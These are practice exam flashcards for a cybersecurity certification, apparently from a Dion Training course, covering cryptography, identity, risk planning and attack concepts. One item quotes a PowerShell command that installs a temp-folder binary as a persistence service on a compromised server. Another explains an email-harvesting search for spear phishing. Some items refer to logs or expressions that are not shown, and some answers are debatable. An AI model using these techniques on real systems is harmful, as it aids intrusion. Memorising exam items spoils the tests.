OBJ-1.1: A NAT Gateway within a cloud platform allows private subnets in a Virtual Private Cloud (VPC) access to the Internet. You can use a NAT gateway so that instances in a private subnet can connect to services outside your VPC but external services cannot initiate a connection with those instances. A VPN gateway is a type of networking device that connects two or more devices or networks in a VPN infrastructure. It is designed to bridge the connection or communication between two or more remote sites, networks, or devices and/or to connect multiple VPNs. An extensible markup language (XML) gateway acts as an application layer firewall specifically to monitor XML formatted messages as they enter or leave a network or system. An XML gateway is used for inbound pattern detection and the prevention of outbound data leaks. XML is a document structure that is both human and machine-readable. Information within an XML document is placed within tags that describe how the information within the document is structured. Application programming interface (API) gateway is a special cloud-based service that is used to centralize the functions provided by APIs. An API is a type of software interface that offers a service to other pieces of software to build or connect to specific functions or features.

59
Q

You are planning an engagement with a new client. The client wants your penetration testers to target their web and email servers that are hosted in a screened subnet and are accessible to visitors over the Internet. Which target type best describes these targets?

A. Third party hosted
B. First party hosted
C. Internal
D. External

A

D. External

Explanation:
OBJ-2.4: An external target type best describes these targets since the question doesn’t clearly describe if the servers are first-party or third-party hosted. An external target type is an asset that can be accessed from outside of the organization. For example, if the web server is visible on the Internet, it is considered an external target. An internal target type means that assets can be accessed from within the organization. This can be either physically or logically from within the network, and it best simulates an insider threat. This target type can also be used to simulate an external hacker who has gained credentials on the network, such as through a spear phishing attack. First-party hosted targets are assets hosted by the client organization themselves. Third-party hosted targets are assets hosted by a vendor, partner, or cloud service provider.

60
Q

Fail To Pass Systems has just been the victim of another embarrassing data breach. Their database administrator needed to work from home this weekend, so he downloaded the corporate database to his work laptop. On his way home, he left the laptop in an Uber, and a few days later, the data was posted on the internet. Which of the following mitigations would have provided the greatest protection against this data breach?

A. Require a VPN to be utilized for all telework employees
B. Require all new employees to sign an NDA
C. Require data masking for any information stored in the database
D. Require data at rest encryption on all endpoints

A

D. Require data at rest encryption on all endpoints

Explanation:
OBJ-3.1: The greatest protection against this data breach would have been to require data at rest encryption on all endpoints, including this laptop. If the laptop were encrypted, the data would not have been readable by others, even if it was lost or stolen. While requiring a VPN for all telework employees is a good idea, it would not have prevented this data breach since the laptop’s loss caused it. Even if a VPN had been used, the same data breach would have still occurred if the employee copied the database to the machine. Remember on exam day that many options are good security practices, but you must select the option that solves the issue or problem in the question being asked. Similarly, data masking and NDAs are useful techniques, but they would not have solved this particular data breach.

61
Q

Dion Training normally rotates their public/private key pairs every 12 months to protect against a potential data breach. These key pairs are then stored in an encrypted online backup with a trusted third-party provider. Unfortunately, the third-party provider just announced that a malicious insider has downloaded a copy of the key pairs. Which of the following actions should Dion Training perform to mitigate this situation?

A. Replace the public/private key pairs with self signed certs
B. Immediately revoke and reissue new public/private key pairs to all users
C. Conduct a key rotation next month per the regular schedule
D. Conduct crypto shredding of the existing public/private key pairs to protect them

A

B. Immediately revoke and reissue new public/private key pairs to all users

Explanation:
OBJ-3.7: A compromised or exposed key occurs when unauthorized access to a symmetric or private key is gained. When a key is compromised or exposed, it must be revoked and replaced. Key rotation is the process of purposely changing keys periodically to mitigate against brute force attacks and key disclosure compromises. During key rotation, the previous key is also revoked and invalidated. Crypto shredding is used to destroy a decryption key to effectively destroy the data that key was used to protect. This technique ensures that the data will remain encrypted if the key is fully destroyed and the encryption algorithm itself remains secure. A self-signed certificate is a certificate generated independently of a certificate authority and is considered not trustworthy.

62
Q

Which role validates the user’s identity when using SAML for authentication?

A. SP
B. User agent
C. RP
D. IdP

A

D. IdP

Explanation:
OBJ-1.5: The IdP provides the validation of the user’s identity. Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

63
Q

Which of the following will an adversary do during the installation phase of the Lockheed Martin kill chain? (SELECT FOUR)

A. Install a backdoor/implant on a client victim
B. Create a point of presence by adding services, scheduled tasks, or AutoRun keys
C. Collect user credentials
D. Open two way communication channel to an established C2 infrastructure
E. Install a webshell on a server
F. Timestomp a malware file to make it appear as if it is part of the OS

A

A. Install a backdoor/implant on a client victim
B. Create a point of presence by adding services, scheduled tasks, or AutoRun keys
E. Install a webshell on a server
F. Timestomp a malware file to make it appear as if it is part of the OS

Explanation:
OBJ-2.1: During the installation phase, the adversary is taking actions to establish a foothold on the target system and is attempting to make it difficult for a defender to detect their presence. The attacker may also attempt to frustrate any attempts to remove them from the system if their presence is detected. Due to this, an attacker will attempt to install multiple backdoors, implants, web shells, scheduled tasks, services, or AutoRun keys to maintain their access to the target. Timestomping is also conducted to hide the presence of malware on the system. Opening up two-way communication with an established C2 infrastructure occurs in the command and control phase. Collecting user credentials occurs in the actions on objectives phase.

64
Q

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

A. Remediate the vulnerability
B. Wait until the next scheduled maintenance window to remediate the vulnerability
C. Delay the remediation until the next major update of the SQL server occurs
D. Schedule an emergency maintenance for an off peak time later in the day to remediate the vulnerability

A

D. Schedule an emergency maintenance for an off peak time later in the day to remediate the vulnerability

Explanation:
OBJ-4.2: Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.

65
Q

A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume?

A. Acquire the recovery key
B. Extract the keys from iCloud
C. Retrieve the key from memory while the volume is mounted
D. Conduct a brute force attack against the FileVault2 encryption

A

D. Conduct a brute force attack against the FileVault2 encryption

Explanation:
OBJ-2.8: FileVault 2 is a full-disk encryption system used on macOS devices. A drive can be decrypted if you have the encryption key. This key can be recovered from memory while the volume is mounted. The Recovery key can also be obtained either from the user’s notes or from their storage area of iCloud. You cannot unlock the volume by conducting a brute force attack against the drive. It uses the AES 256-bit encryption system, which is currently unbreakable without access to a supercomputer. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

66
Q

Jason has created a new password cracking tool using some Python code. When he runs the program, the following output is displayed:
Based on the output, what type of password cracking method does Jason’s new tool utilize?

A. Brute force attack
B. Rainbow attack
C. Dictionary attack
D. Hybrid attack

A

D. Hybrid attack

Explanation:
OBJ-2.4: Based on the passwords found in the example, Jason’s new password cracker is most likely using a hybrid approach. All of the passwords found are dictionary words with some additional characters added to the end. For example, Jason’s password of rover123 is made up of the dictionary word “rover” and the number 123. The cracker likely started with a dictionary word (like rover) and then attempted variations on it using brute force (such as appending 000, 001, 002, …122, 123) to the end of the password until a match was found. Combining the dictionary and brute force methods into a single tool is known as a hybrid password cracking approach.

67
Q

Dion Training has just been awarded a contract to provide training to one of the U.S. Government’s agencies. As part of the contract, Dion Training must encrypt any data being sent to the government using a NIST-approved Federal Information Processing Standard (FIPS) 197. Which symmetric-key algorithm should Dion Training use to meet this contractual requirement?

A. ECC
B. DSA
C. AES
D. 3DES

A

C. AES

Explanation:
OBJ-3.6: The advanced encryption standard (AES) is a cryptographic algorithm used to perform symmetric data encryption using a 128-bit, 192-bit, or 256-bit key. It is approved by NIST as FIPS 197 for all U.S. Government data encryption. Even if you didn’t know that AES was defined in FIPS 197, only the AES and 3DES options are symmetric-key algorithms in this question. Elliptic curve cryptography is a public-key cryptographic algorithm based on the algebraic structure of elliptic curves over finite fields. ECC allows smaller key sizes compared to non-elliptic curve cryptography methods while still providing the equivalent level of security. ECC is heavily used in mobile devices and low-powered device encryption. Triple DES (3DES) is a symmetric-key block cipher that uses a series of encrypt, decrypt, and encrypt functions with three different 56-bit keys to increase the security of the data encryption standard (DES). The digital signature algorithm (DSA) is a cryptographic algorithm that uses logarithmic and modulus math to generate and verify digital signatures. The DSA is faster than RSA at generating digital signatures, but it is slower than RSA when verifying them.

68
Q

Dion Development Group is creating a new communication protocol to aid in the secure transfer of large amounts of data. The programmers programmed the protocol to renegotiate a new session key every 5 minutes or after every 1 GB of data transfer, whichever occurs first during the established communication session. Which of the following cryptographic implementations is used by this communication protocol?

A. Rekeying
B. Key rotation
C. Cryptoshredding
D. Cryptographic obfuscation

A

A. Rekeying

Explanation:
OBJ-3.7: Rekeying is the process of changing an individual key during a communication session. Most communication protocols use session key rekeying to protect the data being transmitted. A rekeying is normally triggered based on the volume of data communicated or the amount of time since the last rekeying. Key rotation is the process of purposely changing keys periodically to mitigate against brute force attacks and key disclosure compromises. During key rotation, the previous key is also revoked and invalidated. Crypto shredding is used to destroy a decryption key to effectively destroy the data that key was used to protect. This technique ensures that the data will remain encrypted if the key is fully destroyed and the encryption algorithm itself remains secure. Cryptographic obfuscation is used to transform protected data into an unreadable format. For example, the Linux user passwords stored in the /etc/shadow file are obfuscated to protect them.

69
Q

Dion Training has developed a complex software as a service product and is moving into the testing phase. The architecture contains individual elements that were developed by different teams in the organization and tested by each team individually. Which of the following types of testing should Dion Training utilize to ensure all of the individual elements are interacting properly when configured into the final product?

A. Integration testing
B. CI/CD
C. Unit testing
D. Regression testing

A

A. Integration testing

Explanation:
Integration testing is used to test individual components of a system together to ensure that they interact as expected. Unit testing is used to verify that a particular block of code performs the exact action intended and provides the exact output expected. Normally, unit testing is coded into the software using simple pass/no pass tests for each block of code. Regression testing is the process of testing an application after changes are made to see if these changes have triggered problems in older areas of code. Continuous integration/continuous delivery (CI/CD) is a software development methodology in which code updates are tested and committed to a development or build server/code repository rapidly.

70
Q

Dion Training is building a cybersecurity escape room as a promotional event at an upcoming security conference. Jason wants to use some form of operational technology to open and shut various doors, windows, and secret compartments in the room. Each physical element must be open or shut based on different logic and programming. Which of the following types of operational technology would allow Jason to program a specific function for each physical element during the installation and implementation?

A. FPGA
B. ASIC
C. IoT
D. SoC

A

A. FPGA

Explanation:
OBJ-3.3: A field programmable gate array (FPGA) is a type of processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture. An FPGA can be configured by the end customer to run programming logic on the device for their specific use case or application. An application-specific integrated circuit (ASIC) is a type of processor designed to perform a specific function. ASICs are expensive to design and only work for a single application or function, such as the ASICs used to conduct switching in an Ethernet switch. A System on a Chip (SoC) integrates practically all the components of a traditional chipset (which is comprised of as many as four chips that control communication between the CPU, RAM, storage, and peripherals) into a single chip. An SoC includes the processor as well as a GPU (graphics processor), memory, USB controller, power management circuits, and wireless radios. Internet of Things (IoT) is a term used to describe a global network of appliances and personal devices that have been equipped with sensors, software, and network connectivity. The Internet of Things includes hub/control systems, smart devices, wearables, and sensors.

71
Q

Which of the following Wireshark filters should be applied to a packet capture to detect applications that send passwords in cleartext to a REST API located at 10.1.2.3?

A. ip.dst=10.1.2.3
B. http.request.method=="POST" && ip.dst==10.1.2.3
C. http.request.method==”POST”
D. ip.proto==tcp

A

B. http.request.method=="POST" && ip.dst==10.1.2.3

Explanation:
OBJ-2.9: Filtering the available PCAP with just the HTTP POST method would display any data sent when accessing a REST API, regardless of the destination IP. Filtering the available PCAP with just the desired IP address would show all traffic to that host (10.1.2.3). Combining both of these narrows the data displayed to only the requests posted to the API located at 10.1.2.3. The ip.proto==tcp filter would display all TCP traffic on the network, regardless of the port, IP address, or application protocol being used. It would simply produce too much information to analyze.

72
Q

In 2014, Apple’s implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of?

A. Insecure object reference
B. Use of insecure functions
C. Improper error handling
D. Insufficient logging and monitoring

A

C. Improper error handling

Explanation:
OBJ-2.5: This is an example of an improper error handling vulnerability. A well-written application must be able to handle errors and exceptions gracefully. The main goal must be for the application not to fail and allow the attacker to execute code or perform an injection attack. One famous example of an improper error handling vulnerability is Apple’s GoTo bug, as described above. For more details on this particular vulnerability, please see CVE-2014-1266. Insecure object reference refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. Insufficient logging and monitoring allow attackers to achieve their goals without being detected due to the lack of monitoring and timely response by defenders. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used. These insecure functions can lead to buffer overflow and other exploits being successful against a program.

73
Q

Dion Training is considering moving its headquarters and data center to Florida, but they are worried about hurricanes disrupting their business operations. To mitigate this risk, Dion Training has signed a contract with a vendor located in a different state to provide hardware, software, and the procedures necessary for the company to recover quickly in the case of a catastrophic event, like a hurricane causing a power loss for up to 10 days. As the owner, Jason is a little concerned that this contract isn’t sufficient to mitigate enough of the risk since it only provides a solution for the first 10 days. Jason wonders, “what will we do if a major outage occurs, and our offices are not able to be used for 6-12 months?” Jason has hired you to help develop Dion Training’s long-term strategy for recovering from such an event. What type of plan should you create?

A. Incident response plan
B. Risk management plan
C. Disaster recovery plan
D. Business continuity plan

A

D. Business continuity plan

Explanation:
OBJ-4.4: A business continuity plan (BCP) is a plan to help ensure that business processes can continue during a time of emergency or disaster. Such emergencies or disasters might include a fire or any other case where business cannot occur under normal conditions. A disaster recovery plan is useful (and usually a piece of the larger business continuity plan), but it is insufficient for the long-term strategy which is needed to support business operations during an extended outage. The key difference between a DRP and a BCP is that a DRP is focused on recovering from a disaster while a BCP is focused on maintaining operations before, during, and after the disaster. Usually, a DRP is a part of an overall BCP.

74
Q

A software company is meeting with a car manufacturer to finalize discussions. In the signed document, the software company will provide the latest versions of its mapping application suite for the car manufacturer’s next generation of cars. In return, the car manufacturer will provide three specific vehicle analytics to the software company to enhance the software company’s mapping application suite. The software company can offer its enhanced mapping application to other car manufacturers but must pay the car manufacturer a royalty. Which of the following BEST describes the document used in this scenario?

A. MSA
B. SLA
C. AUP
D. MOU

A

D. MOU

Explanation:
OBJ-4.3: MOU is a memorandum of understanding. This is the most accurate description based on the choices given. A memorandum of understanding is a document that describes the broad outlines of an agreement that two or more parties have reached. MOUs communicate the mutually accepted expectations of all of the parties involved in a negotiation. While not legally binding, the MOU signals that a binding contract is imminent. A service level agreement (SLA) is a commitment between a service provider and a client for particular aspects of the service, such as quality, availability, or responsibilities. An acceptable use policy (AUP) is a set of rules applied by the owner, creator, or administrator of a network, website, or service, that restrict how the network, website, or system may be used and sets guidelines as to how it should be used. A master service agreement (MSA) is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements.

75
Q

Dion Training installed a new router 183 days ago and it stopped working today due to a faulty power supply. The network technicians replaced the power supply and the router was returned to service within 4 hours. Which of the following terms would BEST represent the 4-hour timeframe?

A. MTTR
B. RTO
C. RPO
D. MTBF

A

A. MTTR

Explanation:
OBJ-4.1: The mean time to repair (MTTR) measures the average time it takes to repair a network device when it breaks. The mean time between failures (MTBF) measures the average time between when failures occur on a device. The recovery time objective (RTO) is the duration of time and a service level within which a business process must be restored after a disaster to avoid unacceptable consequences associated with a break in continuity. The recovery point objective (RPO) is the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the Business Continuity Plan’s maximum allowable threshold or tolerance.

76
Q

Which of the following features of homomorphic encryption allows an item to be retrieved from a service’s database without revealing which item was retrieved?

A. Secure Function Evaluation
B. Secure multi-party computation
C. Private function evaluation
D. Private information retrieval

A

D. Private information retrieval

Explanation:
OBJ-1.8: Private Information Retrieval (PIR) retrieves an item from a service in possession of a database without revealing which item is retrieved. Secure Function Evaluation (SFE) allows two parties to jointly evaluate a publicly known function without revealing their respective inputs. Private Function Evaluation (PFE) allows two parties to jointly evaluate a private function without revealing their respective inputs. Secure Multi-Party Computation creates methods for parties to jointly compute a function over their inputs while keeping those inputs private.

77
Q

A salesperson’s laptop has become unresponsive after attempting to open a PDF in their email. A cybersecurity analyst reviews the IDS and anti-virus software for any alerts or unusual behavior but finds nothing suspicious. Which of the following threats would BEST classify this scenario?

A. Zero day malware
B. Ping of death
C. RAT
D. PII Exfiltration

A

A. Zero day malware

Explanation:
OBJ-2.7: Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods. PII (personally identifiable information) exfiltration is the unauthorized copying, transfer, or retrieval of PII data from a computer or server. A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. Based on the scenario’s information, we do not have any indications that a ping packet was sent, that PII has been exfiltrated, or that the attacker now has remote control of the laptop. Since neither the IDS nor anti-virus alerted on the PDF, it is most likely a form of a zero-day attack.

78
Q

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft’s regular patch. Which of the following options would be best to ensure the systems remain protected and compliant with the rules outlined by the PCI DSS?

A. Identify, implement and document compensating controls
B. Remove the POS terminals from the network until the vendor releases a patch
C. Replace the Windows POS terminals with standard Windows systems
D. Build a custom OS image that includes the patch

A

A. Identify, implement and document compensating controls

Explanation:
OBJ-4.2: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

79
Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

A. SQL Injection
B. CRLF Injection
C. Missing patches
D. Cross site scripting

A

C. Missing patches

Explanation:
OBJ-3.2: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL injection is commonly used against databases, but it is not useful when attacking file servers.

80
Q

You are working as part of a penetration testing team during an engagement. A coworker just entered “New-Service -Name “DionTrainingApp” -BinaryPathName C:\Windows\temp\WindowsTools.exe” in PowerShell on the Windows server the team exploited. What action is your coworker performing with this command?

A. To shutdown the running service on the server
B. To enumerate the running services on the server
C. To remove persistence on the server
D. To enable persistence on the server

A

D. To enable persistence on the server

Explanation:
OBJ-2.4: This scenario is using a command to add persistence to a Windows server using PowerShell. The command entered adds a new service named Dion Training App with the binary listed in the command. This will add persistence to the system by running the Dion Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

81
Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

A. Brute force attack
B. Privilege escalation
C. Spoofing
D. On path attack

A

A. Brute force attack

Explanation:
OBJ-1.5: Since the policy will lock out the student for 15 minutes after three failed attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective. A brute force attack is a type of password attack where an attacker uses an application to exhaustively try every possible alphanumeric combination to crack encrypted passwords. An on-path attack is an attack where the threat actor makes an independent connection between two victims and can read, and possibly modify, their traffic. Privilege escalation is the practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application. Spoofing is a type of attack that disguises a communication from an unknown source as being from a known, trusted source. Spoofing can occur using different methods, such as MAC spoofing, IP spoofing, call spoofing, and others.

82
Q

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry:

Based on this transaction log, which of the following most likely occurred?

A. The application and the SQL database are functioning properly
B. The SQL Server has insufficient logging and monitoring
C. A student with ID#1235235 used a SQL injection to give themselves straight As
D. Someone used a SQL injection to assign straight As to the student with ID #1235235

A

D. Someone used a SQL injection to assign straight As to the student with ID #1235235

Explanation:
OBJ-2.5: Based on this transaction log entry, it appears that the ID# field was not properly validated before being passed to the SQL server. This would allow someone to conduct an SQL injection and retrieve the student’s grades and set all of this student’s grades to an ‘A’ at the same time. It is common to look for a ‘1==1’ type condition to identify an SQL injection. There are other methods to conduct an SQL injection attack that could be utilized by an attacker. If input validation is not being performed on user-entered data, an attacker can exploit any SQL language aspect and inject SQL-specific commands. This entry is suspicious and indicates that either the application or the SQL database is not functioning properly. Still, there appears to be adequate logging and monitoring based on what we can see, and the question never indicates logging was an issue. An SQL database would not be designed to set ALL of a particular student’s grades to A’s, thus making this single entry suspicious. Most SQL statements in an SQL log will be fairly uniform and repetitive by nature when you review them. This leaves us with the question as to who performed this SQL injection. Per the question choices, it could be the student with ID# 1235235 or “someone.” While it seems as if student #1235235 had the most to gain from this, without further investigation, we cannot prove that it actually was student #1235235 that performed the SQL injection. Undoubtedly, student #1235235 should be a person of interest in any ensuing investigations, but additional information (i.e., whose credentials were being used, etc.) should be gathered before making any accusations. Therefore, the answer is that “someone” performed this SQL injection.

83
Q

Which of the following hash algorithms is most vulnerable to a birthday attack or collision?

A. SHA-1
B. Poly1305
C. RIPEMD-160
D. MD5

A

D. MD5

Explanation:
OBJ-3.6: Message Digest Algorithm (MD5) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 128-bit hash digest value to be used for authenticating the original message. MD5 can be easily brute-forced and has a high chance of collision. Secure Hashing Algorithm (SHA-1) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 160-bit hash digest value to be used for authenticating the original message. SHA-1 is considered weak and no longer used for digital signatures, time stamps, or any application that requires collision resistance as of 2015. RACE Integrity Primitives Evaluation Message Digest (RIPEMD-160) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 160-bit hash digest value to be used for authenticating the original message. RIPEMD is used in PGP and the Bitcoin standard. Poly1305 is a cryptographic message authentication code that creates a 128-bit authenticator for any variable-length message to verify the data integrity and authenticity of a message.

84
Q

After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor and will cost $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?

A. Agile Model
B. DevOps
C. DevSecOps
D. Waterfall Model

A

C. DevSecOps

Explanation:
OBJ-1.3: DevSecOps is a combination of software development, security operations, and systems operations and refers to the practice of integrating each discipline with the others. DevSecOps approaches are generally better postured to prevent problems like this because security is built-in during the development instead of retrofitting the program afterward. The DevOps development model incorporates IT staff but does not include security personnel. The agile software development model focuses on iterative and incremental development to account for evolving requirements and expectations. The waterfall software development model cascades the phases of the SDLC so that each phase will start only when all of the tasks identified in the previous phase are complete. A team of developers can make secure software using either the waterfall or agile model. Therefore, they are not the right answers to solve this issue.

85
Q

A facility would like to verify each individual’s identity before allowing access to its server room and data center. Additionally, the building should ensure that users do not tailgate behind other users. What solution would BEST meet these requirements?

A. Implement a biometric reader at the facility entrance and a proximity card at the data center entrance
B. Implement a security guard at the facility entrance and a keypad at the data center entrance
C. Implement a biometric reader at the data center entrance and require passage through an access control vestibule
D. Implement a CCTV camera and a proximity reader at the data center entrance

A

C. Implement a biometric reader at the data center entrance and require passage through an access control vestibule

Explanation:
OBJ-2.6: A biometric reader would read the employee’s fingerprints, retina, or facial features. An access control vestibule (formerly called a mantrap) is most often used in physical security to separate non-secure areas from secure areas and prevent unauthorized access. Combining these two would ensure the identity of the individual and that only one person could enter at a time.

86
Q

Dion Training is registering a new digital certificate to support SSL/TLS connections to its webserver. To create the digital certificate, Jason was required to submit a copy of the company’s articles of incorporation and business license to prove that Dion Training has legal control over the diontraining.com domain name. Which of the following digital certificate types was created in this scenario?

A. Wildcard
B. Multidomain
C. General purpose
D. Extended validation

A

D. Extended validation

Explanation:
OBJ-3.5: Extended Validation (EV) digital certificates are subject to a process that requires more rigorous checks on the subject’s legal identity and control over the domain or software being signed. A major drawback to EV certificates is that they cannot be issued for a wildcard domain. General Purpose or Domain Validation (DV) digital certificates prove the ownership of a particular domain by responding to an email to the authorized domain contact or by publishing a text record to the domain’s DNS records. A wildcard certificate contains the wildcard character (*) in its domain name field and allows the digital certificate to be used for any number of subdomains. For example, the wildcard certificate of *.diontraining.com can be used for members.diontraining.com, cart.diontraining.com, and support.diontraining.com. A multidomain certificate is a single SSL/TLS digital certificate that can be used to secure multiple, different domain names. For example, if you want to install the same certificate on diontraining.com and yourcyberpath.com, you will need to register a multidomain certificate.

87
Q

You are conducting a grep search on a log file using the following REGEX expression:

Which of the following strings would be included in the output of the search?

A. jason_dion@dion.training
B. support@diontraining.com
C. www.diontraining.com
D. jason.dion@diontraining.com

A

B. support@diontraining.com

Explanation:
OBJ-2.2: In the above REGEX, the \b anchor identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9%+-]) is composed of upper or lower case alphanumeric characters and the symbols “%+-.” After the first part of the word, the at sign (@) is specified, followed by another word ([A-Za-z0-9.-]), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.

88
Q

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

A. Vulnerability scanning
B. Automatic updates
C. Scan and patch the device
D. Configuration management

A

A. Vulnerability scanning

Explanation:
OBJ-2.3: The best option here is vulnerability scanning as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could normally be possible solutions, but these are not viable options without gaining administrative access to the appliance. Therefore, the analyst should continue to conduct vulnerability scanning of the device to understand the risks associated with it and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance that could minimize the vulnerabilities it presents.

89
Q

A cybersecurity analyst reviews the logs of a proxy server and sees the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A. Returns no useful results for an attacker
B. Returns all web pages hosted at diontraining.com
C. Returns all web pages containing the text diontraining.com
D. Returns all web pages containing an email address affiliated with diontraining.com

A

D. Returns all web pages containing an email address affiliated with diontraining.com

Explanation:
OBJ-2.2: Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers to return those results.

90
Q

Eduardo is reviewing the security of Dion Training’s website and is reviewing an error concerning their digital certificate. The error code states DLG_FLAGS_SEC_CERT_DATE_INVALID. Which of the following actions should Eduardo perform to fix this error?

A. Update his web browser to support modern cipher suites
B. Request a new digital cert from the cert authority
C. Request his current digital cert to be revoked and reissued
D. Update his OS to support modern cipher suites

A

B. Request a new digital cert from the cert authority

Explanation:
OBJ-3.7: This error indicates a validity date error. A validity date error occurs when a certificate is presented for use on a date that is already past the expiration date. To fix this issue, the owner of the website must request a new digital certificate to renew their identity and create a new digital certificate with an expiration date further in the future. There is no need to request a revocation in this case, since the digital certificate is already expired. Revoking a certificate can only be done on a non-expired digital certificate.

91
Q
A